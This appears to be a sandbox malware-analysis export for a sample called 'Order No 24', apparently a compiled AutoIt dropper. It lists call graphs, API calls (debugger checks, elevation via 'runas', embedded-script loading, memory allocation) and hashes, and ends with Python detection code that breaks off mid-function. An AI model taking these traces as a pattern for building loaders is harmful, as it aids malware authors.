94495->94583 94497 9f4fb6 94499 984517 83 API calls 94498->94499 94500 9cc405 94499->94500 94761 9cc56d 94500->94761 94503 9844ed 64 API calls 94504 9cc432 94503->94504 94505 9844ed 64 API calls 94504->94505 94506 9cc442 94505->94506 94507 9844ed 64 API calls 94506->94507 94508 9cc45d 94507->94508 94509 9844ed 64 API calls 94508->94509 94510 9cc478 94509->94510 94511 984517 83 API calls 94510->94511 94512 9cc48f 94511->94512 94513 9a395c std::exception::_Copy_str 47 API calls 94512->94513 94514 9cc496 94513->94514 94515 9a395c std::exception::_Copy_str 47 API calls 94514->94515 94516 9cc4a0 94515->94516 94517 9844ed 64 API calls 94516->94517 94518 9cc4b4 94517->94518 94519 9cbf5a GetSystemTimeAsFileTime 94518->94519 94520 9cc4c7 94519->94520 94521 9cc4dc 94520->94521 94522 9cc4f1 94520->94522 94523 9a1c9d _free 47 API calls 94521->94523 94524 9cc556 94522->94524 94525 9cc4f7 94522->94525 94526 9cc4e2 94523->94526 94528 9a1c9d _free 47 API calls 94524->94528 94767 9cb965 118 API calls __fcloseall 94525->94767 94529 9a1c9d _free 47 API calls 94526->94529 94531 9cc41b 94528->94531 94529->94531 94530 9cc54e 94532 9a1c9d _free 47 API calls 94530->94532 94531->94406 94533 984252 94531->94533 94532->94531 94534 98425c 94533->94534 94535 984263 94533->94535 94768 9a35e4 94534->94768 94537 984272 94535->94537 94538 984283 FreeLibrary 94535->94538 94537->94406 94538->94537 94588 984339 94539->94588 94543 9841bb 94546 9a3499 94543->94546 94544 984244 FreeLibrary 94544->94543 94545 98423c 94545->94543 94545->94544 94596 9a34ae 94546->94596 94548 9841c8 94548->94479 94548->94480 94675 9842e4 94549->94675 94552 9842b8 94553 9841ec 94552->94553 94554 9842c1 FreeLibrary 94552->94554 94556 984380 94553->94556 94554->94553 94557 99f4ea 48 API calls 94556->94557 94558 984395 94557->94558 94559 9847b7 48 API calls 94558->94559 94560 9843a1 _memcpy_s 94559->94560 94562 984499 94560->94562 94563 9844d1 94560->94563 94566 9843dc 94560->94566 94561 984950 57 API calls 94572 9843e5 
94561->94572 94683 98406b CreateStreamOnHGlobal 94562->94683 94694 9cc750 93 API calls 94563->94694 94566->94561 94567 9844ed 64 API calls 94567->94572 94569 984479 94569->94488 94570 9f4ed7 94571 984517 83 API calls 94570->94571 94573 9f4eeb 94571->94573 94572->94567 94572->94569 94572->94570 94689 984517 94572->94689 94574 9844ed 64 API calls 94573->94574 94574->94569 94576 9844ff 94575->94576 94577 9f4fc0 94575->94577 94718 9a381e 94576->94718 94580 9cbf5a 94738 9cbdb4 94580->94738 94582 9cbf70 94582->94495 94584 98495f 94583->94584 94585 9f5002 94583->94585 94743 9a3e65 94584->94743 94587 984967 94587->94497 94592 98434b 94588->94592 94591 984321 LoadLibraryA GetProcAddress 94591->94545 94593 98422f 94592->94593 94594 984354 LoadLibraryA 94592->94594 94593->94545 94593->94591 94594->94593 94595 984365 GetProcAddress 94594->94595 94595->94593 94599 9a34ba _wprintf 94596->94599 94597 9a34cd 94644 9a7c0e 47 API calls __getptd_noexit 94597->94644 94599->94597 94601 9a34fe 94599->94601 94600 9a34d2 94645 9a6e10 8 API calls _wprintf 94600->94645 94615 9ae4c8 94601->94615 94604 9a3503 94605 9a3519 94604->94605 94606 9a350c 94604->94606 94607 9a3543 94605->94607 94608 9a3523 94605->94608 94646 9a7c0e 47 API calls __getptd_noexit 94606->94646 94629 9ae5e0 94607->94629 94647 9a7c0e 47 API calls __getptd_noexit 94608->94647 94614 9a34dd _wprintf @_EH4_CallFilterFunc@8 94614->94548 94616 9ae4d4 _wprintf 94615->94616 94617 9a7cf4 __lock 47 API calls 94616->94617 94627 9ae4e2 94617->94627 94618 9ae559 94654 9a69d0 47 API calls std::exception::_Copy_str 94618->94654 94619 9ae552 94649 9ae5d7 94619->94649 94622 9ae560 94622->94619 94624 9ae56f InitializeCriticalSectionAndSpinCount EnterCriticalSection 94622->94624 94623 9ae5cc _wprintf 94623->94604 94624->94619 94625 9a7d7c __mtinitlocknum 47 API calls 94625->94627 94627->94618 94627->94619 94627->94625 94652 9a4e5b 48 API calls __lock 94627->94652 94653 9a4ec5 LeaveCriticalSection LeaveCriticalSection _doexit 94627->94653 
94630 9ae600 __wopenfile 94629->94630 94631 9ae61a 94630->94631 94640 9ae7d5 94630->94640 94661 9a185b 59 API calls 2 library calls 94630->94661 94659 9a7c0e 47 API calls __getptd_noexit 94631->94659 94633 9ae61f 94660 9a6e10 8 API calls _wprintf 94633->94660 94635 9a354e 94648 9a3570 LeaveCriticalSection LeaveCriticalSection _fseek 94635->94648 94636 9ae838 94656 9b63c9 94636->94656 94639 9ae7ce 94639->94640 94662 9a185b 59 API calls 2 library calls 94639->94662 94640->94631 94640->94636 94642 9ae7ed 94642->94640 94663 9a185b 59 API calls 2 library calls 94642->94663 94644->94600 94645->94614 94646->94614 94647->94614 94648->94614 94655 9a7e58 LeaveCriticalSection 94649->94655 94651 9ae5de 94651->94623 94652->94627 94653->94627 94654->94622 94655->94651 94664 9b5bb1 94656->94664 94658 9b63e2 94658->94635 94659->94633 94660->94635 94661->94639 94662->94642 94663->94640 94665 9b5bbd _wprintf 94664->94665 94666 9b5bcf 94665->94666 94668 9b5c06 94665->94668 94667 9a7c0e _wprintf 47 API calls 94666->94667 94669 9b5bd4 94667->94669 94670 9b5c78 __wsopen_helper 110 API calls 94668->94670 94671 9a6e10 _wprintf 8 API calls 94669->94671 94672 9b5c23 94670->94672 94673 9b5bde _wprintf 94671->94673 94674 9b5c4c __wsopen_helper LeaveCriticalSection 94672->94674 94673->94658 94674->94673 94679 9842f6 94675->94679 94678 9842cc LoadLibraryA GetProcAddress 94678->94552 94680 9842aa 94679->94680 94681 9842ff LoadLibraryA 94679->94681 94680->94552 94680->94678 94681->94680 94682 984310 GetProcAddress 94681->94682 94682->94680 94684 984085 FindResourceExW 94683->94684 94686 9840a2 94683->94686 94685 9f4f16 LoadResource 94684->94685 94684->94686 94685->94686 94687 9f4f2b SizeofResource 94685->94687 94686->94566 94687->94686 94688 9f4f3f LockResource 94687->94688 94688->94686 94690 984526 94689->94690 94691 9f4fe0 94689->94691 94695 9a3a8d 94690->94695 94693 984534 94693->94572 94694->94566 94696 9a3a99 _wprintf 94695->94696 94697 9a3aa7 94696->94697 94699 9a3acd 94696->94699 94708 
9a7c0e 47 API calls __getptd_noexit 94697->94708 94710 9a4e1c 94699->94710 94700 9a3aac 94709 9a6e10 8 API calls _wprintf 94700->94709 94703 9a3ad3 94716 9a39fe 81 API calls 5 library calls 94703->94716 94705 9a3ae2 94717 9a3b04 LeaveCriticalSection LeaveCriticalSection _fseek 94705->94717 94707 9a3ab7 _wprintf 94707->94693 94708->94700 94709->94707 94711 9a4e4e EnterCriticalSection 94710->94711 94712 9a4e2c 94710->94712 94713 9a4e44 94711->94713 94712->94711 94714 9a4e34 94712->94714 94713->94703 94715 9a7cf4 __lock 47 API calls 94714->94715 94715->94713 94716->94705 94717->94707 94721 9a3839 94718->94721 94720 984510 94720->94580 94722 9a3845 _wprintf 94721->94722 94723 9a385b _memset 94722->94723 94724 9a3888 94722->94724 94725 9a3880 _wprintf 94722->94725 94734 9a7c0e 47 API calls __getptd_noexit 94723->94734 94726 9a4e1c __lock_file 48 API calls 94724->94726 94725->94720 94727 9a388e 94726->94727 94736 9a365b 62 API calls 6 library calls 94727->94736 94730 9a3875 94735 9a6e10 8 API calls _wprintf 94730->94735 94731 9a38a4 94737 9a38c2 LeaveCriticalSection LeaveCriticalSection _fseek 94731->94737 94734->94730 94735->94725 94736->94731 94737->94725 94741 9a344a GetSystemTimeAsFileTime 94738->94741 94740 9cbdc3 94740->94582 94742 9a3478 __aulldiv 94741->94742 94742->94740 94744 9a3e71 _wprintf 94743->94744 94745 9a3e7f 94744->94745 94746 9a3e94 94744->94746 94757 9a7c0e 47 API calls __getptd_noexit 94745->94757 94748 9a4e1c __lock_file 48 API calls 94746->94748 94750 9a3e9a 94748->94750 94749 9a3e84 94758 9a6e10 8 API calls _wprintf 94749->94758 94759 9a3b0c 55 API calls 6 library calls 94750->94759 94753 9a3ea5 94760 9a3ec5 LeaveCriticalSection LeaveCriticalSection _fseek 94753->94760 94755 9a3eb7 94756 9a3e8f _wprintf 94755->94756 94756->94587 94757->94749 94758->94756 94759->94753 94760->94755 94766 9cc581 __tzset_nolock _wcscmp 94761->94766 94762 9cc417 94762->94503 94762->94531 94763 9844ed 64 API calls 94763->94766 94764 9cbf5a GetSystemTimeAsFileTime 
94764->94766 94765 984517 83 API calls 94765->94766 94766->94762 94766->94763 94766->94764 94766->94765 94767->94530 94769 9a35f0 _wprintf 94768->94769 94770 9a361c 94769->94770 94771 9a3604 94769->94771 94774 9a4e1c __lock_file 48 API calls 94770->94774 94776 9a3614 _wprintf 94770->94776 94797 9a7c0e 47 API calls __getptd_noexit 94771->94797 94773 9a3609 94798 9a6e10 8 API calls _wprintf 94773->94798 94777 9a362e 94774->94777 94776->94535 94781 9a3578 94777->94781 94782 9a359b 94781->94782 94783 9a3587 94781->94783 94789 9a3597 94782->94789 94800 9a2c84 94782->94800 94840 9a7c0e 47 API calls __getptd_noexit 94783->94840 94785 9a358c 94841 9a6e10 8 API calls _wprintf 94785->94841 94799 9a3653 LeaveCriticalSection LeaveCriticalSection _fseek 94789->94799 94793 9a35b5 94817 9ae9d2 94793->94817 94795 9a35bb 94795->94789 94796 9a1c9d _free 47 API calls 94795->94796 94796->94789 94797->94773 94798->94776 94799->94776 94801 9a2c97 94800->94801 94805 9a2cbb 94800->94805 94802 9a2933 __flswbuf 47 API calls 94801->94802 94801->94805 94803 9a2cb4 94802->94803 94842 9aaf61 94803->94842 94806 9aeb36 94805->94806 94807 9a35af 94806->94807 94808 9aeb43 94806->94808 94810 9a2933 94807->94810 94808->94807 94809 9a1c9d _free 47 API calls 94808->94809 94809->94807 94811 9a293d 94810->94811 94812 9a2952 94810->94812 94948 9a7c0e 47 API calls __getptd_noexit 94811->94948 94812->94793 94814 9a2942 94949 9a6e10 8 API calls _wprintf 94814->94949 94816 9a294d 94816->94793 94818 9ae9de _wprintf 94817->94818 94819 9ae9fe 94818->94819 94820 9ae9e6 94818->94820 94822 9aea7b 94819->94822 94827 9aea28 94819->94827 94965 9a7bda 47 API calls __getptd_noexit 94820->94965 94969 9a7bda 47 API calls __getptd_noexit 94822->94969 94823 9ae9eb 94966 9a7c0e 47 API calls __getptd_noexit 94823->94966 94826 9aea80 94970 9a7c0e 47 API calls __getptd_noexit 94826->94970 94830 9aa8ed ___lock_fhandle 49 API calls 94827->94830 94828 9ae9f3 _wprintf 94828->94795 94832 9aea2e 94830->94832 94831 9aea88 94971 9a6e10 
8 API calls _wprintf 94831->94971 94834 9aea4c 94832->94834 94835 9aea41 94832->94835 94967 9a7c0e 47 API calls __getptd_noexit 94834->94967 94950 9aea9c 94835->94950 94838 9aea47 94968 9aea73 LeaveCriticalSection __unlock_fhandle 94838->94968 94840->94785 94841->94789 94843 9aaf6d _wprintf 94842->94843 94844 9aaf8d 94843->94844 94845 9aaf75 94843->94845 94847 9ab022 94844->94847 94852 9aafbf 94844->94852 94940 9a7bda 47 API calls __getptd_noexit 94845->94940 94945 9a7bda 47 API calls __getptd_noexit 94847->94945 94848 9aaf7a 94941 9a7c0e 47 API calls __getptd_noexit 94848->94941 94851 9ab027 94946 9a7c0e 47 API calls __getptd_noexit 94851->94946 94867 9aa8ed 94852->94867 94855 9ab02f 94947 9a6e10 8 API calls _wprintf 94855->94947 94856 9aafc5 94858 9aafeb 94856->94858 94859 9aafd8 94856->94859 94942 9a7c0e 47 API calls __getptd_noexit 94858->94942 94876 9ab043 94859->94876 94861 9aaf82 _wprintf 94861->94805 94863 9aafe4 94944 9ab01a LeaveCriticalSection __unlock_fhandle 94863->94944 94864 9aaff0 94943 9a7bda 47 API calls __getptd_noexit 94864->94943 94868 9aa8f9 _wprintf 94867->94868 94869 9aa946 EnterCriticalSection 94868->94869 94870 9a7cf4 __lock 47 API calls 94868->94870 94871 9aa96c _wprintf 94869->94871 94872 9aa91d 94870->94872 94871->94856 94873 9aa93a 94872->94873 94874 9aa928 InitializeCriticalSectionAndSpinCount 94872->94874 94875 9aa970 ___lock_fhandle LeaveCriticalSection 94873->94875 94874->94873 94875->94869 94877 9ab050 __ftell_nolock 94876->94877 94878 9ab0ac 94877->94878 94879 9ab08d 94877->94879 94924 9ab082 94877->94924 94884 9ab105 94878->94884 94885 9ab0e9 94878->94885 94881 9a7bda __lseeki64 47 API calls 94879->94881 94880 9aa70c __except_handler4 6 API calls 94882 9ab86b 94880->94882 94883 9ab092 94881->94883 94882->94863 94886 9a7c0e _wprintf 47 API calls 94883->94886 94887 9ab11c 94884->94887 94891 9af82f __lseeki64_nolock 49 API calls 94884->94891 94888 9a7bda __lseeki64 47 API calls 94885->94888 94890 9ab099 94886->94890 94892 9b3bf2 
__flswbuf 47 API calls 94887->94892 94889 9ab0ee 94888->94889 94893 9a7c0e _wprintf 47 API calls 94889->94893 94894 9a6e10 _wprintf 8 API calls 94890->94894 94891->94887 94895 9ab12a 94892->94895 94896 9ab0f5 94893->94896 94894->94924 94897 9ab44b 94895->94897 94904 9a7a0d __setmbcp 47 API calls 94895->94904 94900 9a6e10 _wprintf 8 API calls 94896->94900 94898 9ab7b8 WriteFile 94897->94898 94899 9ab463 94897->94899 94903 9ab7e1 GetLastError 94898->94903 94935 9ab410 94898->94935 94901 9ab55a 94899->94901 94902 9ab479 94899->94902 94900->94924 94919 9ab565 94901->94919 94923 9ab663 94901->94923 94906 9ab81b 94902->94906 94909 9ab4e9 WriteFile 94902->94909 94903->94935 94905 9ab150 GetConsoleMode 94904->94905 94905->94897 94907 9ab189 94905->94907 94910 9a7c0e _wprintf 47 API calls 94906->94910 94906->94924 94907->94897 94908 9ab199 GetConsoleCP 94907->94908 94934 9ab1c2 94908->94934 94908->94935 94909->94903 94911 9ab526 94909->94911 94912 9ab843 94910->94912 94911->94902 94922 9ab555 94911->94922 94911->94935 94916 9a7bda __lseeki64 47 API calls 94912->94916 94913 9ab7f7 94917 9ab7fe 94913->94917 94918 9ab812 94913->94918 94914 9ab5de WriteFile 94914->94903 94920 9ab62d 94914->94920 94915 9ab6d8 WideCharToMultiByte 94915->94903 94931 9ab71f 94915->94931 94916->94924 94925 9a7c0e _wprintf 47 API calls 94917->94925 94921 9a7bed __dosmaperr 47 API calls 94918->94921 94919->94906 94919->94914 94920->94919 94920->94922 94920->94935 94921->94924 94922->94935 94923->94906 94923->94915 94924->94880 94927 9ab803 94925->94927 94926 9ab727 WriteFile 94928 9ab77a GetLastError 94926->94928 94926->94931 94929 9a7bda __lseeki64 47 API calls 94927->94929 94928->94931 94929->94924 94930 9a1688 __chsize_nolock 57 API calls 94930->94934 94931->94922 94931->94923 94931->94926 94931->94935 94932 9b40f7 59 API calls __chsize_nolock 94932->94934 94933 9b5884 WriteConsoleW CreateFileW __chsize_nolock 94937 9ab2f6 94933->94937 94934->94930 94934->94932 94934->94935 94936 9ab28f 
WideCharToMultiByte 94934->94936 94934->94937 94935->94906 94935->94913 94935->94924 94936->94935 94938 9ab2ca WriteFile 94936->94938 94937->94903 94937->94933 94937->94934 94937->94935 94939 9ab321 WriteFile 94937->94939 94938->94903 94938->94937 94939->94903 94939->94937 94940->94848 94941->94861 94942->94864 94943->94863 94944->94861 94945->94851 94946->94855 94947->94861 94948->94814 94949->94816 94972 9aaba4 94950->94972 94952 9aeb00 94985 9aab1e 48 API calls 2 library calls 94952->94985 94954 9aeaaa 94954->94952 94955 9aeade 94954->94955 94958 9aaba4 __lseeki64_nolock 47 API calls 94954->94958 94955->94952 94956 9aaba4 __lseeki64_nolock 47 API calls 94955->94956 94959 9aeaea CloseHandle 94956->94959 94957 9aeb08 94960 9aeb2a 94957->94960 94986 9a7bed 47 API calls 3 library calls 94957->94986 94961 9aead5 94958->94961 94959->94952 94962 9aeaf6 GetLastError 94959->94962 94960->94838 94964 9aaba4 __lseeki64_nolock 47 API calls 94961->94964 94962->94952 94964->94955 94965->94823 94966->94828 94967->94838 94968->94828 94969->94826 94970->94831 94971->94828 94973 9aabaf 94972->94973 94974 9aabc4 94972->94974 94975 9a7bda __lseeki64 47 API calls 94973->94975 94977 9a7bda __lseeki64 47 API calls 94974->94977 94979 9aabe9 94974->94979 94976 9aabb4 94975->94976 94978 9a7c0e _wprintf 47 API calls 94976->94978 94980 9aabf3 94977->94980 94981 9aabbc 94978->94981 94979->94954 94982 9a7c0e _wprintf 47 API calls 94980->94982 94981->94954 94983 9aabfb 94982->94983 94984 9a6e10 _wprintf 8 API calls 94983->94984 94984->94981 94985->94957 94986->94960 94987->94415 94988->94425 94989->94425 94990->94426 94991->94439 94992->94441 94993->94438 94994->94444 94995->94451 94996->94465 94997->94461 94999 9af8a0 __ftell_nolock 94998->94999 95000 9840b4 GetLongPathNameW 94999->95000 95001 986a63 48 API calls 95000->95001 95002 9840dc 95001->95002 95003 9849a0 95002->95003 95004 98d7f7 48 API calls 95003->95004 95005 9849b2 95004->95005 95006 98660f 49 API calls 95005->95006 95007 9849bd 
[Call graph export (interactive figure); the remainder of the node/edge listing is not reproduced here. API labels that appear on nodes in this part of the export: CloseHandle, SetFilePointerEx, ReadFile, SetCurrentDirectoryW, GetStringTypeW, CharUpperBuffW, CharLowerBuffW, EnumResourceNamesW, LoadImageW, RegisterClassExW, DestroyIcon, LoadStringW, Shell_NotifyIconW, TranslateAcceleratorW, IsDialogMessageW, GetClassLongW, InterlockedDecrement, GetFileAttributesW, FindFirstFileW, FindClose, VirtualProtect, GetCurrentProcess, TerminateProcess, FreeLibrary, GetStdHandle, CoInitialize, CreateThread, RegisterWindowMessageW, PostQuitMessage, DefWindowProcW, SetTimer, KillTimer, CreatePopupMenu, MoveWindow, SetFocus, DeleteObject, DestroyWindow. The nodes at addresses 0x1271910 to 0x1274e8a carry the labels GetPEB, Sleep, CreateFileW, ReadFile, VirtualAlloc, VirtualFree and CloseHandle.]

Control-flow Graph

Legend: Executed / Not Executed (interactive figure; the basic-block listing is not reproduced here). Function at 0x9ab043, blocks 0x9ab043 to 0x9ab86c; API calls labelled in the blocks: GetConsoleMode, GetConsoleCP, WideCharToMultiByte, WriteFile, GetLastError.
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
• Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 57a51958d74929b9b993abf0328b1fcdc932b73c23905ac9a39d3d6c719ccb96
                                                                                                                                  • Instruction ID: 3ca2b0ba836b11f5787cb1279356e3110861f6ada2f8aa8387a57d12d48fe2e3
                                                                                                                                  • Opcode Fuzzy Hash: 57a51958d74929b9b993abf0328b1fcdc932b73c23905ac9a39d3d6c719ccb96
                                                                                                                                  • Instruction Fuzzy Hash: D0324F75B022288BDB24CF58DC416E9B7B9FB4B314F1841D9E40AA7A52D7349E81CF92

Control-flow Graph (rendered graph omitted)

                                                                                                                                  APIs
                                                                                                                                  • GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,00983AA3,?), ref: 00983D45
                                                                                                                                  • IsDebuggerPresent.KERNEL32(?,?,?,?,00983AA3,?), ref: 00983D57
                                                                                                                                  • GetFullPathNameW.KERNEL32(00007FFF,?,?,00A41148,00A41130,?,?,?,?,00983AA3,?), ref: 00983DC8
                                                                                                                                    • Part of subcall function 00986430: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00983DEE,00A41148,?,?,?,?,?,00983AA3,?), ref: 00986471
                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?,?,?,00983AA3,?), ref: 00983E48
                                                                                                                                  • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,00A328F4,00000010), ref: 009F1CCE
                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?,00A41148,?,?,?,?,?,00983AA3,?), ref: 009F1D06
                                                                                                                                  • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00A1DAB4,00A41148,?,?,?,?,?,00983AA3,?), ref: 009F1D89
                                                                                                                                  • ShellExecuteW.SHELL32(00000000,?,?,?,?,00983AA3), ref: 009F1D90
                                                                                                                                    • Part of subcall function 00983E6E: GetSysColorBrush.USER32(0000000F), ref: 00983E79
                                                                                                                                    • Part of subcall function 00983E6E: LoadCursorW.USER32(00000000,00007F00), ref: 00983E88
                                                                                                                                    • Part of subcall function 00983E6E: LoadIconW.USER32(00000063), ref: 00983E9E
                                                                                                                                    • Part of subcall function 00983E6E: LoadIconW.USER32(000000A4), ref: 00983EB0
                                                                                                                                    • Part of subcall function 00983E6E: LoadIconW.USER32(000000A2), ref: 00983EC2
                                                                                                                                    • Part of subcall function 00983E6E: RegisterClassExW.USER32(?), ref: 00983F30
                                                                                                                                    • Part of subcall function 009836B8: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 009836E6
                                                                                                                                    • Part of subcall function 009836B8: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00983707
                                                                                                                                    • Part of subcall function 009836B8: ShowWindow.USER32(00000000,?,?,?,?,00983AA3,?), ref: 0098371B
                                                                                                                                    • Part of subcall function 009836B8: ShowWindow.USER32(00000000,?,?,?,?,00983AA3,?), ref: 00983724
                                                                                                                                    • Part of subcall function 00984FFC: _memset.LIBCMT ref: 00985022
                                                                                                                                    • Part of subcall function 00984FFC: Shell_NotifyIconW.SHELL32(00000000,?), ref: 009850CB
                                                                                                                                  Strings
                                                                                                                                  • runas, xrefs: 009F1D84
                                                                                                                                  • This is a third-party compiled AutoIt script., xrefs: 009F1CC8
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$IconLoad$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundMessageNotifyPresentRegisterShellShell__memset
                                                                                                                                  • String ID: This is a third-party compiled AutoIt script.$runas
                                                                                                                                  • API String ID: 438480954-3287110873
                                                                                                                                  • Opcode ID: 59c1751129640a6f34b5d1309366f4890e870957ea80643a4186e665de0acd14
                                                                                                                                  • Instruction ID: 096e58533d10d55ff2e4b97846c00ab6f250efa26f91c305b043d01be4ddb281
                                                                                                                                  • Opcode Fuzzy Hash: 59c1751129640a6f34b5d1309366f4890e870957ea80643a4186e665de0acd14
                                                                                                                                  • Instruction Fuzzy Hash: FC510539A44248BBCB11FBF8DC45FED7B79AFC6B00F008169F21166292DB754686CB21

• Control-flow graph for the function at 0099DDC0 (rendered graph omitted; basic blocks 0099DDC0 to 0099DF3B, with out-of-line blocks at 009F244E to 009F24F8). APIs reached from inside this graph: GetVersionExW, GetCurrentProcess, GetNativeSystemInfo, GetSystemInfo, FreeLibrary.
                                                                                                                                  APIs
                                                                                                                                  • GetVersionExW.KERNEL32(?), ref: 0099DDEC
                                                                                                                                  • GetCurrentProcess.KERNEL32(00000000,00A1DC38,?,?), ref: 0099DEAC
                                                                                                                                  • GetNativeSystemInfo.KERNELBASE(?,00A1DC38,?,?), ref: 0099DF01
                                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,?), ref: 0099DF0C
                                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,?), ref: 0099DF1F
                                                                                                                                  • GetSystemInfo.KERNEL32(?,00A1DC38,?,?), ref: 0099DF29
                                                                                                                                  • GetSystemInfo.KERNEL32(?,00A1DC38,?,?), ref: 0099DF35
                                                                                                                                  Similarity
                                                                                                                                  • API ID: InfoSystem$FreeLibrary$CurrentNativeProcessVersion
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3851250370-0
                                                                                                                                  • Opcode ID: 4b84ad5403354b707c038852881853740771f16003e24b0e221b74f95e6e6340
                                                                                                                                  • Instruction ID: a466e65408f8131aa8b927271b4ddcf02acd35d0042e1b3aafd9a8d264f2e13d
                                                                                                                                  • Opcode Fuzzy Hash: 4b84ad5403354b707c038852881853740771f16003e24b0e221b74f95e6e6340
                                                                                                                                  • Instruction Fuzzy Hash: B761C4B180A388DFCF15CFA898C12EDBFB86F69300B1949D9D8459F247C674C909CB65

• Control-flow graph for the function at 0098406B (rendered graph omitted; basic blocks 0098406B to 009840A6, with out-of-line blocks at 009F4F16 to 009F4F6E). APIs reached from inside this graph, in order: CreateStreamOnHGlobal, FindResourceExW, LoadResource, SizeofResource, LockResource.
                                                                                                                                  APIs
                                                                                                                                  • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,0098449E,?,?,00000000,00000001), ref: 0098407B
                                                                                                                                  • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,0098449E,?,?,00000000,00000001), ref: 00984092
                                                                                                                                  • LoadResource.KERNEL32(?,00000000,?,?,0098449E,?,?,00000000,00000001,?,?,?,?,?,?,009841FB), ref: 009F4F1A
                                                                                                                                  • SizeofResource.KERNEL32(?,00000000,?,?,0098449E,?,?,00000000,00000001,?,?,?,?,?,?,009841FB), ref: 009F4F2F
                                                                                                                                  • LockResource.KERNEL32(0098449E,?,?,0098449E,?,?,00000000,00000001,?,?,?,?,?,?,009841FB,00000000), ref: 009F4F42
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                                                                  • String ID: SCRIPT
                                                                                                                                  • API String ID: 3051347437-3967369404
                                                                                                                                  • Opcode ID: 1b467a9c4092565056fabd2c1ff490bcd64d393878be4fb2e93988ec0e8fe7ef
                                                                                                                                  • Instruction ID: af0f14ed296a4577cbdafe69b1ce330bddeebf9f221bcb8657fd5c1eac2073ce
                                                                                                                                  • Opcode Fuzzy Hash: 1b467a9c4092565056fabd2c1ff490bcd64d393878be4fb2e93988ec0e8fe7ef
                                                                                                                                  • Instruction Fuzzy Hash: 49111871200705BFE7219BA5EC48F677BBDEFC9B51F10856CB602962A0DA61DC028A20
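The API sequence of the function above (FindResourceExW with type 0000000A, i.e. RT_RCDATA, and name SCRIPT, followed by LoadResource, SizeofResource and LockResource) is how the AutoIt runtime stub locates its embedded compiled script, and it is the indicator behind the report's "Binary is likely a compiled AutoIt script file" signature. The following Python is an added example, not part of the Joe Sandbox report or of the sample: it performs the same three-level lookup (type, name, language) on the raw bytes of a PE .rsrc section so the check can be run offline without the Windows loader. The resource tree, icon bytes and script bytes are constructed for the example, and the section RVA 0x3000 is an assumption.

```python
"""
Offline equivalent of the loader's resource lookup:
FindResourceExW(hModule, RT_RCDATA (0x0A), L"SCRIPT", 0) -> LoadResource ->
SizeofResource -> LockResource. Operates on the raw bytes of a PE .rsrc
section, so it needs no Windows API. Added example; the resource tree below
is constructed for it and is not the sample's real resource section.
"""
import struct

RT_ICON = 3
RT_RCDATA = 10          # the type passed as 0000000A in the FindResourceExW call
SUBDIR = 0x80000000     # high bit: entry points to a sub-directory / a name string
DIR_FMT = "<IIHHHH"     # IMAGE_RESOURCE_DIRECTORY (16 bytes)


def _read_dir(rsrc, off):
    """Yield (key, is_named, target_off, is_subdir) for each entry of the
    IMAGE_RESOURCE_DIRECTORY at `off`. Named keys are upper-cased because
    FindResource matches names case-insensitively."""
    n_named, n_id = struct.unpack_from("<HH", rsrc, off + 12)
    pos = off + 16
    for _ in range(n_named + n_id):
        name_field, data_field = struct.unpack_from("<II", rsrc, pos)
        pos += 8
        if name_field & SUBDIR:                      # IMAGE_RESOURCE_DIR_STRING_U
            s = name_field & 0x7FFFFFFF
            (length,) = struct.unpack_from("<H", rsrc, s)
            key, named = rsrc[s + 2:s + 2 + 2 * length].decode("utf-16-le").upper(), True
        else:
            key, named = name_field, False
        yield key, named, data_field & 0x7FFFFFFF, bool(data_field & SUBDIR)


def find_resource(rsrc, rsrc_rva, type_id, name, lang=None):
    """Return the bytes of resource (type_id, name), or None if it is absent,
    which is the loader's failure path. lang=None takes the first language
    entry; the Windows loader's own language fallback rules are not reproduced."""
    want = name.upper() if isinstance(name, str) else name
    for key, named, off, sub in _read_dir(rsrc, 0):               # level 1: type
        if named or key != type_id or not sub:
            continue
        for key2, _, off2, sub2 in _read_dir(rsrc, off):          # level 2: name
            if key2 != want or not sub2:
                continue
            for key3, _, off3, sub3 in _read_dir(rsrc, off2):     # level 3: language
                if sub3 or (lang is not None and key3 != lang):
                    continue
                # IMAGE_RESOURCE_DATA_ENTRY: OffsetToData (RVA), Size, CodePage, Reserved
                data_rva, size, _cp, _rsv = struct.unpack_from("<IIII", rsrc, off3)
                start = data_rva - rsrc_rva
                return rsrc[start:start + size]
    return None


def has_autoit_script_resource(rsrc, rsrc_rva):
    """True when an RT_RCDATA resource named SCRIPT exists, the indicator the
    report's 'compiled AutoIt script' signature is built on."""
    return find_resource(rsrc, rsrc_rva, RT_RCDATA, "SCRIPT") is not None


def build_sample_rsrc(rsrc_rva, icon_bytes, script_bytes):
    """Construct a minimal .rsrc section: RT_ICON #1 (lang 0x409) and
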